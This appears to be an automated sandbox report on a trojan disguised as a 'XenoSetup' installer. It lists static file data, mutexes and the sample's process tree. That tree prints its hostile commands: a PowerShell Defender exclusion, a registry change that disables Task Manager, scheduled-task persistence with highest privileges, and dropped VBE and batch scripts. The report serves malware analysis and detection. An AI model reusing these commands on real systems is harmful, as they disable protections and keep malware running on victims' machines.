                      Source: lmJukoKX.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: TZhoQTpI.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: RPLnQAKH.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: IlCyhHua.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: remTNUPL.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: ZSKNtyuw.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: NZUxJEKO.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: vMsrqipz.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: ldZbGFkR.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: UWIwmTED.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: BFVQSOun.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: ogLKbooN.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: ARRIhAyp.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: LxMgmcSS.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: BOtQCANk.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: jCRLjesV.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: ZTxvzCno.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: ESyrPCdJ.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: BcHAIFcQ.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: qodKYthi.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: NoWOUMSl.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: vcvJAqxW.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: PIQPERQj.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: xvoKkvvU.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: uOpJsBHp.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: NpzpwslB.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: dQveIBvX.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: UfDWuYEk.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: gQJUAkON.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: FSpHSmDL.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: MPdHuBxA.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: GpvhmufF.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: paukoYZl.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: frbUEvTD.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: XOSeUCEW.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: GGCzAPYH.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: eLGexRyL.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: LuUydMov.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: kEjDZxDz.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: GyShWgyC.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: eDXMSiYF.log.32.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: XenoSetup(2).exe.bin.exeBinary or memory string: OriginalFilenameXenoSetup(2).exe4 vs XenoSetup(2).exe.bin.exe
                      Source: XenoSetup(2).exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                      Source: DriverbrokerCrtDhcp.exe.6.drStatic PE information: Section: .reloc ZLIB complexity 1.01171875
                      Source: NZdXlPbVdUubKXQ.exe.15.drStatic PE information: Section: .reloc ZLIB complexity 1.01171875
                      Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@75/85@5/0
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FE6C74 GetLastError,FormatMessageW,6_2_00FE6C74
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FFA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,6_2_00FFA6C2
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XenoSetup(2).exe.bin.exe.logJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3968:120:WilError_03
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeMutant created: \Sessions\1\BaseNamedObjects\Z0cqwH6NGPmdGfDEN
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:352:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-SbjZ9dzDfzVchxMwaR3O
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:404:120:WilError_03
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCommand line argument: sfxname6_2_00FFDF1E
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCommand line argument: sfxstime6_2_00FFDF1E
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCommand line argument: STARTDLG6_2_00FFDF1E
                      Source: XenoSetup(2).exe.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: XenoSetup(2).exe.bin.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: XenoSetup(2).exe.bin.exeReversingLabs: Detection: 55%
                      Source: Xeno.exeString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
                      Source: Xeno.exeString found in binary or memory: Learn more: https://aka.ms/dotnet/app-launch-failed Would you like to download it now?
                      Source: Xeno.exeString found in binary or memory: %s App: %s Architecture: %s App host version: %s .NET location: %s Learn more: https://aka.ms/dotnet/app-launch-failed Download
                      Source: Xeno.exeString found in binary or memory: %sApp: %sArchitecture: %sApp host version: %s.NET location: %sLearn more:https://aka.ms/dotnet/app-launch-failedDownload
                      Source: Xeno.exeString found in binary or memory: Learn more:https://aka.ms/dotnet/app-launch-failedWould you like to download it now?
                      Source: unknownProcess created: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe "C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe"
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe"
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\Xeno.exe "C:\Users\user\AppData\Local\Temp\Xeno.exe"
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe"
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe"
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NZdXlPbVdUubKXQN" /sc MINUTE /mo 8 /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /f
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NZdXlPbVdUubKXQ" /sc ONLOGON /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /rl HIGHEST /f
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NZdXlPbVdUubKXQN" /sc MINUTE /mo 12 /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /rl HIGHEST /f
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4177.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP"
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES436B.tmp" "c:\Users\user\AppData\Local\Temp\CSCF5A66DC0AE3041F58A3C1CE4B9A61B98.TMP"
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES458E.tmp" "c:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP"
                      Source: unknownProcess created: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess created: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DriverbrokerCrtDhcpD" /sc MINUTE /mo 10 /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /f
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DriverbrokerCrtDhcp" /sc ONLOGON /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /rl HIGHEST /f
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DriverbrokerCrtDhcpD" /sc MINUTE /mo 13 /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /rl HIGHEST /f
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8dcADkVv20.bat"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                      Source: unknownProcess created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                      Source: unknownProcess created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
                      Source: unknownProcess created: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe'Jump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe" Jump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\Xeno.exe "C:\Users\user\AppData\Local\Temp\Xeno.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"Jump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline"Jump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.cmdline"Jump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline"Jump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8dcADkVv20.bat" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
